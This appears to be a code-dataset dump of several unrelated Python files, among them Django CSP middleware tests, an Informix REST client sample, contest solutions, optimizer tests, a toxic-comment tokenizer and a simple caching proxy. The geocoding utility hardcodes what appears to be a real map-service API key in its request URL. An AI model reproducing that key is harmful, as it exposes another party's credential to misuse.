handler.setFormatter(formatter)\n\n screen_handler = logging.StreamHandler(stream=sys.stdout)\n screen_handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n logger.addHandler(screen_handler)\n\n return logger\n\n# class Logger(object):\n# \"\"\"Tensorboard logger.\"\"\"\n\n# def __init__(self, log_dir):\n# \"\"\"Initialize summary writer.\"\"\"\n# self.writer = tf.summary.FileWriter(log_dir)\n\n# def scalar_summary(self, tag, value, step):\n# \"\"\"Add scalar summary.\"\"\"\n# summary = tf.Summary(value=[tf.Summary.Value(tag=tag, simple_value=value)])\n# self.writer.add_summary(summary, step)\n\n# def close(self):\n# self.writer.export_scalars_to_json(\"./all_scalars.json\")\n# 
self.writer.close()","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"531735852","text":"from django.http import HttpResponse, HttpResponseServerError\nfrom django.test import RequestFactory\nfrom django.test.utils import override_settings\n\nfrom csp.middleware import CSPMiddleware\n\n\nHEADER = 'Content-Security-Policy'\nmw = CSPMiddleware()\nrf = RequestFactory()\n\n\ndef test_add_header():\n    request = rf.get('/')\n    response = HttpResponse()\n    mw.process_response(request, response)\n    assert HEADER in response\n\n\ndef test_exempt():\n    request = rf.get('/')\n    response = HttpResponse()\n    response._csp_exempt = True\n    mw.process_response(request, response)\n    assert HEADER not in response\n\n\n@override_settings(CSP_EXCLUDE_URL_PREFIXES=('/inlines-r-us',))\ndef test_exclude():\n    request = rf.get('/inlines-r-us/foo')\n    response = HttpResponse()\n    mw.process_response(request, response)\n    assert HEADER not in response\n\n\n@override_settings(CSP_REPORT_ONLY=True)\ndef test_report_only():\n    request = rf.get('/')\n    response = HttpResponse()\n    mw.process_response(request, response)\n    assert HEADER not in response\n    assert HEADER + '-Report-Only' in response\n\n\ndef test_dont_replace():\n    request = rf.get('/')\n    response = HttpResponse()\n    response[HEADER] = 'default-src example.com'\n    mw.process_response(request, response)\n    assert response[HEADER] == 'default-src example.com'\n\n\ndef test_use_config():\n    request = rf.get('/')\n    response = HttpResponse()\n    response._csp_config = {'default-src': ['example.com']}\n    mw.process_response(request, response)\n    assert response[HEADER] == 'default-src example.com'\n\n\ndef test_use_update():\n    request = rf.get('/')\n    response = HttpResponse()\n    response._csp_update = {'default-src': ['example.com']}\n    mw.process_response(request, response)\n    assert response[HEADER] == \"default-src 'self' example.com\"\n\n\n@override_settings(CSP_IMG_SRC=['foo.com'])\ndef test_use_replace():\n    request = rf.get('/')\n    response = HttpResponse()\n    response._csp_replace = {'img-src': ['bar.com']}\n    mw.process_response(request, response)\n    assert response[HEADER] == \"default-src 'self'; img-src bar.com\"\n\n\n@override_settings(DEBUG=True)\ndef test_debug_exempt():\n    request = rf.get('/')\n    response = HttpResponseServerError()\n    mw.process_response(request, response)\n    assert HEADER not in response\n","sub_path":"csp/tests/test_middleware.py","file_name":"test_middleware.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"377806913","text":"import json\nimport requests\n\n##\n# Python sample application: connecting to Informix using REST\n##\n\n# Topics\n# 1 Inserts\n# 1.1 Insert a single document to a collection\n# 1.2 Insert multiple documents to a collection\n# 2 Queries\n# 2.1 Find all documents in a collection\n# 2.2 Find documents in a collection that match a query condition\n# 2.3 Add a projection clause to a query\n# 2.4 Find documents in a collection and retrieve using a cursor\n# 3 Update documents in a collection\n# 4 Delete documents in a collection\n# 5 Get a listing of collections\n# 6 Drop a collection\n# 7 Run a command\n\n### Connection information ###\nbaseUrl=\"http://localhost:8080\"\ndbname=\"test\"\nbaseDbUrl=baseUrl + \"/\" + dbname\nauthInfo=('user','pass')\ncookieName=\"informixRestListener.sessionId\"\n\ndef 
printError(message, reply):\n print(\"Error: \" + message)\n print(\"status code: \" + str(reply.status_code))\n print(\"content: \" + str(reply.content))\n\nprint(\"# 1 Inserts\")\nprint(\"# 1.1 Insert a single document to a collection\")\ndata = json.dumps({'firstName':'Luke', 'lastName':'Skywalker', 'age': 34})\nreply = requests.post(baseDbUrl+\"/people\", data, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"inserted \" + str(doc.get('n')) + \" documents\")\nelse:\n printError(\"Unable to insert document\", reply)\n\nprint(\"# 1.2 Insert multiple documents to a collection\")\ndata = json.dumps([{'firstName':'Leia', 'lastName':'Skywalker', 'age': 34}, {'firstName':'Anakin', 'lastName':'Skywalker', 'age': 55} ] )\nreply = requests.post(baseDbUrl+\"/people\", data, auth=authInfo)\nif reply.status_code == 202:\n doc = reply.json()\n print(\"inserted \" + str(doc.get('n')) + \" documents\")\nelse:\n printError(\"Unable to insert multiple documents\", reply)\n\nprint(\"# 2 Queries\")\nprint(\"# 2.1 Find all documents in a collection\")\nreply = requests.get(baseDbUrl+\"/people\", None, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"query result: \" + str(doc))\nelse:\n printError(\"Unable to query documents in collection\", reply)\n\nprint(\"# 2.2 Find documents in a collection that match a query condition\")\nquery = json.dumps({'firstName':'Luke'})\nreply = requests.get(baseDbUrl+\"/people?query=\" + query, None, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"query result: \" + str(doc))\nelse:\n printError(\"Unable to query documents in collection\", reply)\n\nprint(\"# 2.3 Add a projection clause to a query\")\nprojection = json.dumps({'firstName':1, 'age': 1, '_id':0})\nreply = requests.get(baseDbUrl+\"/people?fields=\" + projection, None, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"query result: \" + str(doc))\nelse:\n printError(\"Unable to query documents in collection\", reply)\n\nprint(\"# 2.4 Find documents in a collection and retrieve using a cursor\")\nprojection = json.dumps({'colname':1, 'tabid': 1, 'coltype':1})\nreply = requests.get(baseDbUrl+\"/syscolumns?fields=\" + projection, None, auth=authInfo)\nif reply.status_code == 200:\n fetchNum = 1\n cursor_id = reply.headers['cursorid']\n cookies = dict()\n cookies[cookieName]=reply.cookies[cookieName]\n headers = {'cursorid':cursor_id}\n print (\"reply headers: \" + str(reply.headers))\n print (\"cursor id: \" + cursor_id)\n print (\"cookies = \" + str(cookies))\n print (\"fetch \" + str(fetchNum) + \": \" + str(reply.json()))\n moreRows = (cursor_id != 0)\n while (moreRows):\n reply = requests.get(baseDbUrl+\"/syscolumns?fields=\" + projection, None, headers=headers,cookies=cookies)\n fetchNum += 1\n print (\"fetch \" + str(fetchNum) + \": \" + str(reply.json()))\n if reply.status_code == 200:\n moreRows = reply.headers.get('cursorid') != None\n else : \n moreRows = False\n printError(\"Unable to get more documents from a cursor\", reply) \nelse:\n printError(\"Unable to query documents in collection using a cursor\", reply)\n\nprint(\"# 3 Update documents in a collection\")\nquery = json.dumps({'firstName': 'Luke'})\ndata = json.dumps({'$set' : {'age' : 35} })\nreply = requests.put(baseDbUrl+\"/people?query=\" + query, data, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"updated \" + str(doc.get('n')) + \" documents\")\nelse:\n printError(\"Unable to update documents in 
collection\", reply)\n\nprint(\"# 4 Delete documents in a collection\")\nquery = json.dumps({'age': { '$gt': 50} })\nreply = requests.delete(baseDbUrl+\"/people?query=\" + query, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"deleted \" + str(doc.get('n')) + \" documents\")\nelse:\n printError(\"Unable to delete documents in collection\", reply)\n\nprint(\"# 5 Get a listing of collections\")\nreply = requests.get(baseDbUrl)\nif reply.status_code == 200:\n doc = reply.json()\n dbList = \"\"\n for db in doc:\n dbList += \"\\'\" + db + \"\\' \"\n print(\"Collections: \" + str(dbList))\nelse:\n printError(\"Unable to retrieve collection listing\", reply)\n \nprint(\"# 6 Drop a collection\")\nreply = requests.delete(baseDbUrl+\"/people\", auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"delete collection result: \" + str(doc))\nelse:\n printError(\"Unable to drop collection\", reply)\n\nprint(\"# 7 Run a command\")\ncommand = json.dumps({'dbStats':1})\nreply = requests.get(baseDbUrl+\"/$cmd?query=\" + command, None, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"command result: \" + str(doc))\nelse:\n printError(\"Unable to run command\", reply)\n","sub_path":"python/rest/HelloGalaxy/HelloWorld.py","file_name":"HelloWorld.py","file_ext":"py","file_size_in_byte":5535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"485407334","text":"import re\n\n\ndef main(file_text):\n cases = file_text.splitlines()\n cases = cases[1:] # drop the first line with row count\n i = 0\n text = ''\n for sentence in cases:\n i += 1\n words = sentence.split()\n words.reverse()\n text += 'Case #' + str(i) + ': ' + ' '.join(words) + '\\n'\n\n return text\n\nif __name__ == '__main__':\n inputs = ['this is a test', 'foobar', 'all your base']\n # main(inputs)\n open('B-small-practice.out', 'w').write(\n main(open('B-small-practice.in', 'r').read())\n )\n\n open('B-large-practice.out', 'w').write(\n main(open('B-large-practice.in', 'r').read())\n )","sub_path":"ReverseWords/ReverseWords.py","file_name":"ReverseWords.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"113598663","text":"from datetime import datetime\nfrom sectionize import pdf_to_text, parse\nimport glob\nimport logging\n\ndef just_pdf2text():\n \"\"\"\n Hmm. With 115 dockets, this finished in 3 seconds, for .026 seconds per docket.\n this suggests that the problem is not the pdf2text, but in text2stitched. :(\n \"\"\"\n print(\"Testing time of pdf to text.\")\n directory = \"./testDocs/test_two/pdfs/*.pdf\"\n iter = glob.iglob(directory)\n start = datetime.now()\n counter = 0\n for file in iter:\n pdf_to_text(file)\n counter += 1\n end = datetime.now()\n print(\"Finished.\")\n duration = (end-start).seconds\n print(\"Processed {} dockets in {} seconds.\".format(counter, duration))\n print(\"{} seconds per docket.\".format(duration/counter))\n print(\"Thanks for playing our game.\")\n\ndef just_parse():\n \"\"\"\"\n This is the slow one. For 115 dockets, it took 80 seconds, or .76 seconds\n per docket. This is the stumbling block in the whole thing. 
Why is this\n method so slow?!\n \"\"\"\n logging.basicConfig(filename=\"parse_timing.md\", level=logging.DEBUG)\n logging.info(\"pdf2text_time, create_grammar_time, parse_grammar_time, node_visitor_time\")\n print(\"Testing time of parse(), which includes pdf2text.\")\n directory = \"./testDocs/test_two/pdfs/*.pdf\"\n iter = glob.iglob(directory)\n start = datetime.now()\n counter = 0\n for file in iter:\n parse(file)\n counter += 1\n end = datetime.now()\n print(\"Finished.\")\n duration = (end-start).seconds\n print(\"Processed {} dockets in {} seconds.\".format(counter, duration))\n print(\"{} seconds per docket.\".format(duration/counter))\n print(\"Thanks for playing our game.\")\n\njust_parse()\n\n\n","sub_path":"scripts/study_pdf2text_timing.py","file_name":"study_pdf2text_timing.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"69431867","text":"import numpy as np\n\nfrom opytimizer.core import function\nfrom opytimizer.optimizers import ba\nfrom opytimizer.spaces import search\nfrom opytimizer.utils import constants\n\n\ndef test_ba_hyperparams():\n hyperparams = {\n 'f_min': 0,\n 'f_max': 2,\n 'A': 0.5,\n 'r': 0.5\n }\n\n new_ba = ba.BA(hyperparams=hyperparams)\n\n assert new_ba.f_min == 0\n\n assert new_ba.f_max == 2\n\n assert new_ba.A == 0.5\n\n assert new_ba.r == 0.5\n\n\ndef test_ba_hyperparams_setter():\n new_ba = ba.BA()\n\n try:\n new_ba.f_min = 'a'\n except:\n new_ba.f_min = 0.1\n\n try:\n new_ba.f_min = -1\n except:\n new_ba.f_min = 0.1\n\n assert new_ba.f_min == 0.1\n\n try:\n new_ba.f_max = 'b'\n except:\n new_ba.f_max = 2\n\n try:\n new_ba.f_max = -1\n except:\n new_ba.f_max = 2\n\n try:\n new_ba.f_max = 0\n except:\n new_ba.f_max = 2\n\n assert new_ba.f_max == 2\n\n try:\n new_ba.A = 'c'\n except:\n new_ba.A = 0.5\n\n try:\n new_ba.A = -1\n except:\n new_ba.A = 0.5\n\n assert new_ba.A == 0.5\n\n try:\n new_ba.r = 'd'\n except:\n new_ba.r = 0.5\n\n try:\n new_ba.r = -1\n except:\n new_ba.r = 0.5\n\n assert new_ba.r == 0.5\n\n\ndef test_ba_build():\n new_ba = ba.BA()\n\n assert new_ba.built == True\n\n\ndef test_ba_update_frequency():\n new_ba = ba.BA()\n\n frequency = new_ba._update_frequency(0, 2)\n\n assert frequency != 0\n\n\ndef test_ba_update_velocity():\n new_ba = ba.BA()\n\n velocity = new_ba._update_velocity(1, 1, 1, 1)\n\n assert velocity != 0\n\n\ndef test_ba_update_position():\n new_ba = ba.BA()\n\n position = new_ba._update_position(1, 1)\n\n assert position == 2\n\n\ndef test_ba_run():\n def square(x):\n return np.sum(x**2)\n\n def hook(optimizer, space, function):\n return\n\n new_function = function.Function(pointer=square)\n\n hyperparams = {\n 'f_min': 0,\n 'f_max': 2,\n 'A': 1,\n 'r': 0.5\n }\n\n new_ba = ba.BA(hyperparams=hyperparams)\n\n search_space = search.SearchSpace(n_agents=10, n_iterations=100,\n n_variables=2, lower_bound=[0, 0],\n upper_bound=[10, 10])\n\n history = new_ba.run(search_space, new_function, pre_evaluation_hook=hook)\n\n assert len(history.agents) > 0\n assert len(history.best_agent) > 0\n\n best_fitness = history.best_agent[-1][1]\n assert best_fitness <= constants.TEST_EPSILON, 'The algorithm ba failed to converge.'\n","sub_path":"tests/opytimizer/optimizers/test_ba.py","file_name":"test_ba.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"454470366","text":"n, d = map(int, input().split())\r\nseq = list(map(int, 
input().split()))\r\n\r\nflag, count, pos = False, 0, -1\r\nwhile pos < n-2:\r\n\tpos += 1\r\n\ttarget1 = seq[pos]+d\r\n\tfor i in range(pos+1, n-1):\r\n\t\tif seq[i] == target1:\r\n\t\t\ttarget2 = seq[i]+d\r\n\t\t\tfor j in range(i+1, n):\r\n\t\t\t\tif seq[j] == target2:\r\n\t\t\t\t\tcount += 1\r\n\t\t\t\t\tflag = True\r\n\t\t\t\tif seq[j] > target2:\r\n\t\t\t\t\tflag = True\r\n\t\t\t\tif flag: \r\n\t\t\t\t\tbreak\r\n\t\tif seq[i] > target1:\r\n\t\t\tflag = True\r\n\t\tif flag: \r\n\t\t\tbreak\r\n\tflag = False\r\nprint(count)\r\n","sub_path":"contests/HackerRank/HackerRank World Codesprint April/problemB.py","file_name":"problemB.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"324205218","text":"# author: HuYong\n# coding=utf-8\nimport json\nfrom math import *\nimport requests\n\n\ndef calcDistance(Lat_A, Lng_A, Lat_B, Lng_B):\n    ra = 6378.140 # equatorial radius (km)\n    rb = 6356.755 # polar radius (km)\n    flatten = (ra - rb) / ra # flattening of the Earth\n    rad_lat_A = radians(Lat_A)\n    rad_lng_A = radians(Lng_A)\n    rad_lat_B = radians(Lat_B)\n    rad_lng_B = radians(Lng_B)\n    pA = atan(rb / ra * tan(rad_lat_A))\n    pB = atan(rb / ra * tan(rad_lat_B))\n    xx = acos(sin(pA) * sin(pB) + cos(pA) * cos(pB) * cos(rad_lng_A - rad_lng_B))\n    c1 = (sin(xx) - xx) * (sin(pA) + sin(pB)) ** 2 / cos(xx / 2) ** 2\n    c2 = (sin(xx) + xx) * (sin(pA) - sin(pB)) ** 2 / sin(xx / 2) ** 2\n    dr = flatten / 8 * (c1 - c2)\n    distance = ra * (xx + dr)\n    return float('%.4f' % distance) * 1000\n\n\ndef GetAddress(longitude, latitude):\n    BaseUrl = \"http://restapi.amap.com/v3/geocode/regeo?output=json&location=LON,LAT&key=KEY&radius=100&extensions=all&roadlevel=0&poitype=楼\"\n    URL = BaseUrl.replace(\"LON\", str(longitude)).replace(\"LAT\", str(latitude)).replace(\"KEY\",\"9c9aaf8f45b7d23a26274866b578a2a9\")\n    response = requests.get(URL)\n    s = json.loads(response.text)\n    return s[\"regeocode\"][\"formatted_address\"]\n\n#print GetAddress(118.721893,32.141903)\n","sub_path":"wechat/WeChatUtil.py","file_name":"WeChatUtil.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"198101381","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*-\n# ==============================================================================\n# \\file normalize.py\n# \\author chenghuige \n# \\date 2018-02-13 19:51:49.324339\n# \\Description \n# ==============================================================================\n\n \nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\nimport sys, os\n\nfrom collections import namedtuple\nimport gezi\n\nimport re\n\ntry:\n  import toxic_words\nexcept Exception:\n  import prepare.toxic_words\n\n# TODO...\ntry:\n  from preprocess import *\nexcept Exception:\n  from prepare.preprocess import *\n\nip_pattern = r\"(\\d+\\.\\d+\\.\\d+\\.\\d+)\"\nhttp_pattern = r\"(https?|ftp|file)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+[-A-Za-z0-9+&@#/%=~_|]\"\n\n# !NOTICE can not set file name to tokenize, will conflict with python3 some tokenize.py \nvocab = None\n\n# this vocab is the originally calculated word freq vocab just using like spacy without any further split or other operations\ntrain_vocab = None \n\ntrain_vocab_path = '/home/gezi/data/kaggle/toxic/ori_vocab.txt'\nMIN_COUNT = 20\n\nSimpleTokens = namedtuple('SimpleTokens', ['tokens', 'ori_tokens', 
'attributes'])\nTokens = namedtuple('Tokens', ['tokens', \n 'attributes',\n 'ori_tokens',\n 'poses', \n 'tags',\n 'ners',\n ])\n\ndef init(vocab_path='/home/gezi/data/glove/glove-vocab.txt'):\n global vocab, train_vocab\n if vocab:\n return vocab, train_vocab\n vocab = set() \n for line in open(vocab_path, encoding='utf-8', errors='ignore'):\n vocab.add(line.rstrip('\\n').split('\\t')[0])\n\n # train_vocab = {}\n # for line in open(train_vocab_path):\n # word, count = line.rstrip('\\n').split('\\t')\n # train_vocab[word] = int(count)\n\n return vocab, train_vocab\n\n# def train_dict_has(word):\n# for w in (word, word.lower(), word.capitalize(), word.upper()):\n# if w in train_vocab and train_vocab[w] > MIN_COUNT:\n# return True\n# return False\n\ndef dict_has(word):\n for w in (word, word.lower(), word.capitalize(), word.upper()):\n if w in vocab:\n return True\n return False \n\ndef has(word):\n if not word.strip():\n return False\n #return train_dict_has(word) and dict_has(word)\n return dict_has(word)\n\n\n# problem here is will also remove some other language word like '你' TODO\ndef en_filter(token):\n en_results = []\n results = []\n ens = []\n non_ens = []\n for x in token:\n #if x >= 'a' and x <= 'z' or x >= 'A' and x <= 'Z' or x >= '0' and x <= '9':\n if x >= 'a' and x <= 'z' or x >= 'A' and x <= 'Z':\n if non_ens:\n results.append(''.join(non_ens))\n non_ens = []\n ens.append(x)\n else:\n if ens:\n results.append(''.join(ens))\n en_results.append(results[-1])\n ens = []\n non_ens.append(x)\n if ens:\n results.append(''.join(ens))\n en_results.append(results[-1])\n if non_ens:\n results.append(''.join(non_ens))\n \n return results, en_results\n\n# def can_split(w1, w2):\n# if train_dict_has(w1):\n# if train_dict_has(w2) or dict_has(w2):\n# return True \n# else:\n# return False\n# else:\n# if dict_has(w1) and train_dict_has(w2):\n# return True \n# else:\n# return False\ndef can_split(w1, w2):\n return dict_has(w1) and dict_has(w2) or is_toxic(w1) or is_toxic(w2)\n \ndef try_split(token):\n if len(token) < 6 or has(token):\n return [token]\n \n start = 3\n end = len(token) - 2\n idx = int(len(token) / 2)\n\n for i in range(idx, end):\n w1 = token[:i]\n w2 = token[i:]\n #print('w1:', w1, 'w2:', w2, can_split(w1, w2), train_dict_has(w1), dict_has(w1), train_dict_has(w2), dict_has(w2))\n if can_split(w1, w2):\n return [w1, '', w2]\n\n for i in reversed(range(start, idx)):\n w1 = token[:i]\n w2 = token[i:]\n #print('w1:', w1, 'w2:', w2, can_split(w1, w2), train_dict_has(w1), dict_has(w1), train_dict_has(w2), dict_has(w2))\n if can_split(w1, w2):\n return [w1, '', w2]\n \n return [token]\n\nattribute_names = ['len', 'deform', 'lower', 'upper', 'has_star', 'has_dot', 'has_bracket', 'not_en']\nattribute_default_values = [0.] 
* len(attribute_names)\nAttributes = namedtuple('Attributes', attribute_names)\n\nassert(len(attribute_names) == len(attribute_default_values))\n\nspecial_tokens = set(['', '', ''])\n\n# toxic_words = set([\n# 'fuck', 'fucking', 'fuckin', \n# 'cunt', 'cunts',\n# 'dick', 'penis', 'bitch', 'nigger', 'die', 'kill'])\n\ndef is_toxic(word):\n for w in (word, word.lower(), word.capitalize(), word.upper()):\n if w in toxic_words.get_toxic_words():\n return True\n return False\n\n# def maybe_toxic(word):\n# for w in toxic_words:\n# if w in word:\n# return True\n# return False\n\ndef get_token_len(token):\n if token in special_tokens:\n return 1\n return len(token)\n\n\ndef is_en(token):\n for x in token:\n if x >= 'a' and x <= 'z' or x >= 'A' and x <= 'Z' or x >= '0' and x <= '9':\n return True \n return False\n\ndef get_attr(token, \n deform=False,\n has_star=False, \n has_dot=False,\n has_bracket=False,\n not_en=False):\n return [get_token_len(token), \n deform,\n token not in special_tokens and token.islower(), \\\n token not in special_tokens and token.isupper(), \\\n has_star, has_dot, has_bracket, not is_en(token)]\n\n\ndef tokenize(text):\n init()\n text = normalize(text)\n\n tokens = gezi.segment.tokenize_filter_empty(text)\n results = []\n attributes = []\n ori_tokens = []\n\n def append(token, ori_token, attr=None):\n results.append(token)\n ori_tokens.append(ori_token)\n attributes.append(attr or get_attr(token))\n\n for token in tokens:\n ori_token = token\n\n #print('results', results)\n if token in tokens_map:\n token = tokens_map[token]\n append(token, ori_token)\n else:\n if FLAGS.is_twitter:\n token = token.lower()\n else:\n if re.match(ip_pattern, token):\n token = ''\n\n # NOTICE! if http hurt perf, remove!\n if re.match(http_pattern, token):\n token = ''\n\n if has(token):\n append(token, ori_token)\n else:\n tokens, en_tokens = en_filter(token)\n tokens = [x for x in tokens if x.strip()]\n en_token = ''.join(en_tokens)\n #print('----...', tokens, en_token, en_tokens)\n # Nig(g)er -> Nigger but lose some info might just 'Nig', '', 'g', '', 'er' ? or mark as deformed word! TODO add to word vector\n if has(en_token):\n has_star = '*' in token\n has_dot = '.' in token\n has_bracket = '(' in token or ')' in token or '[' in token or ']' in token or '(' in token or ')' in token\n is_deform = is_toxic(en_token)\n\n if is_deform:\n print(en_token, token, ori_token)\n \n attr = [len(token), \n is_deform, en_token.islower(), en_token.isupper(), \n has_star, has_dot, has_bracket, False]\n if is_deform:\n append(en_token, ori_token, attr)\n else:\n append(token, ori_token, attr)\n else:\n token_results = try_split(en_token)\n if len(token_results) == 1:\n token_results = []\n for token in en_tokens:\n #print('----', token)\n token_results += try_split(token)\n token_results += ['']\n if token_results:\n del token_results[-1]\n for token in token_results:\n append(token, ori_token, get_attr(token, True))\n else:\n append(token, ori_token)\n else:\n for token in token_results:\n append(token, ori_token, get_attr(token, True))\n\n if not results:\n token = 'ok'\n append(token, token)\n\n assert len(results) == len(attributes)\n return SimpleTokens(*([results, ori_tokens, attributes]))\n\n# TODO merge code\n\n \ndef full_tokenize(text):\n init()\n # can cause http.. 
as PERSON\n text = normalize(text)\n doc = gezi.doc(text)\n results = []\n attributes = []\n poses = []\n tags = []\n ners = []\n ori_tokens = []\n\n def append(token, ori_token, ner='NONE', attr=None):\n results.append(token)\n poses.append(ori_token.pos_)\n tags.append(ori_token.tag_)\n attributes.append(attr or get_attr(token))\n ners.append(ner)\n ori_tokens.append(ori_token.text.replace(' ', '').replace('NEWLINE', '\\x01'))\n \n ner_idx = 0\n ner_list = [(x.text, x.label_) for x in doc.ents]\n \n ner_ok = True \n for x, y in ner_list:\n if 'NEWLINE' in x:\n ner_ok = False \n break \n \n #print('-----ner list', ner_list, ner_ok)\n if not ner_ok:\n ner_list = []\n\n for token_ in doc:\n token = token_.text\n \n # NOTICE! filtered empty text, if not filter later you must not split by ' ', here already remove will ok\n if not token.strip():\n continue\n\n if FLAGS.is_twitter:\n token = token.lower()\n else:\n if re.match(ip_pattern, token):\n token = ''\n\n # NOTICE! if http hurt perf, remove!\n if re.match(http_pattern, token):\n token = ''\n\n # TODO better..\n ner = 'NONE'\n for i in range(ner_idx, len(ner_list)):\n if token == ner_list[i][0] or (len(token) > 2 and token in ner_list[i][0]):\n ner = ner_list[i][1]\n ner_idx = i + 1\n break\n #if ner != 'None':\n # print(token, ner)\n\n if token in tokens_map:\n token = tokens_map[token]\n append(token, token_, ner)\n else:\n if FLAGS.is_twitter:\n token = token.lower()\n else:\n if re.match(ip_pattern, token):\n token = ''\n\n # NOTICE! if http hurt perf, remove!\n if re.match(http_pattern, token):\n token = ''\n\n #if has(token) or (ner != 'NONE' and not maybe_toxic(token)):\n if has(token):\n #if has(token) or ner == 'PERSON':\n append(token, token_, ner)\n else:\n #print('token', token)\n tokens, en_tokens = en_filter(token)\n tokens = [x for x in tokens if x.strip()]\n en_token = ''.join(en_tokens)\n #print('!!!', tokens, en_tokens, en_token)\n # Nig(g)er -> Nigger but lose some info might just 'Nig', '', 'g', '', 'er' ? or mark as deformed word! TODO add to word vector\n #if has(en_token) or (ner != 'NONE' and not maybe_toxic(token)):\n if has(en_token):\n #if has(en_token) or ner == 'PERSON':\n has_star = '*' in token\n has_dot = '.' 
in token\n has_bracket = '(' in token or ')' in token or '[' in token or ']' in token or '(' in token or ')' in token\n is_deform = is_toxic(en_token)\n attr = [len(token), is_deform,\n en_token.islower(), en_token.isupper(), \n has_star, has_dot, has_bracket, False]\n if is_deform:\n append(en_token, token_, ner, attr)\n else:\n append(token, token_, ner, attr)\n else:\n token_results = try_split(en_token)\n if len(token_results) == 1:\n token_results = []\n for token in en_tokens:\n #print('----', token)\n token_results += try_split(token)\n token_results += ['']\n if token_results:\n del token_results[-1]\n for token in token_results:\n append(token, token_, ner, get_attr(token, True))\n else:\n append(token, token_, ner)\n else:\n for token in token_results:\n append(token, token_, ner, get_attr(token, True))\n\n if not results:\n return full_tokenize('ok')\n assert len(results) == len(attributes) == len(ori_tokens) == len(poses) == len(tags) == len(ners)\n return Tokens(*([results, attributes, ori_tokens, poses, tags, ners]))\n","sub_path":"projects/ai/kaggle/toxic/prepare/tokenizer-v3.py","file_name":"tokenizer-v3.py","file_ext":"py","file_size_in_byte":12070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"169061850","text":"import codecs\nfrom genericpath import exists\nimport os\nimport socket\nimport sys\nimport threading\nimport datetime\n\nip = 'localhost'\nport = 8888\ndata = datetime.datetime.now()\n\n# read the cache lifetime from the command line\ntimeInCache = sys.argv[1]\n#-----------------------\n\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind((ip, port))\nserver.listen(5)\nprint(f\"Escutando: {ip} \nporta: {port}\")\nserver_client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\ndef conexao_em_espera(conexao, addr):\n print('Nova Conexão: ', addr)\n\n\ndef post_it(salvar_cache):\n no_cache = '\\n<p style=\"background:yellow\">\\n    Novo: {}\\n</p>\\n    '.format(data)\n if salvar_cache.find(b'html') != -1:\n respostaEmString = salvar_cache.decode()\n indiceDoBody = respostaEmString.find(\"<body>\")\n novaRespostaEmString = respostaEmString[:indiceDoBody + 6] + no_cache + respostaEmString[indiceDoBody + 6:]\n print(novaRespostaEmString)\n if novaRespostaEmString.find(\"Cache-Control: max-age=604800\") != -1:\n novaRespostaEmString = novaRespostaEmString.replace(\"Cache-Control: max-age=604800\",\"Cache-Control: max-age=120\")\n print(novaRespostaEmString)\n return novaRespostaEmString\n else:\n return salvar_cache.decode(errors='ignore') # keep the return type consistent for the caller's .encode()\n \n\ndef salvar_em_cache(carregamento_pag, conexao, str_dominio,imag_str):\n salvar_cache = codecs.decode(carregamento_pag, encoding= 'base64')\n salvar_cacheSTR = str(salvar_cache)\n arquivo = open(str_dominio+imag_str+'.txt','w')\n arquivo.write(salvar_cacheSTR)\n #arquivo.close()\n #amarelonatela = \n #post_it(salvar_cache,conexao)\n #return amarelonatela\n\ndef ler_cache(str_dominio,imag_str):\n ler_arquivo = open(str_dominio+imag_str,'r')\n return ler_arquivo\n\ndef conexao_browser(str_dominio, url_Complexa_Divisao, urlTratamento, conexao, addr,imag_str):\n \n teste_tamanho_url = (len(url_Complexa_Divisao))\n #www.example.org\n if teste_tamanho_url != 0:\n for count in range (len(url_Complexa_Divisao)-1):\n concatenar_url_complex = url_Complexa_Divisao[count]+'/'+url_Complexa_Divisao[count+1]\n concatenar_url_complexSTR = str(concatenar_url_complex)\n complemento_url = concatenar_url_complexSTR.split(\"'\")[0]\n conexao_url = ('GET /'+complemento_url+' HTTP/1.1\\r\\nHost: '+str_dominio+'\\r\\n\\r\\n')\n else:\n conexao_url = ('GET / HTTP/1.1\\r\\nHost: '+str_dominio+'\\r\\n\\r\\n')\n \n server_client.sendall(conexao_url.encode())\n carregamento_pag = server_client.recv(350000)\n carregamento_pag_com_post_it = post_it(carregamento_pag)\n conexao.sendall(carregamento_pag_com_post_it.encode())\n print(\"Valor Informado: \", urlTratamento)\n thread = threading.Thread(target=conexao_em_espera, args=(conexao,addr))\n thread.start()\n print(f\"Conexão Recebida: \", {threading.active_count() - 1})\n salvar_em_cache(carregamento_pag,conexao, 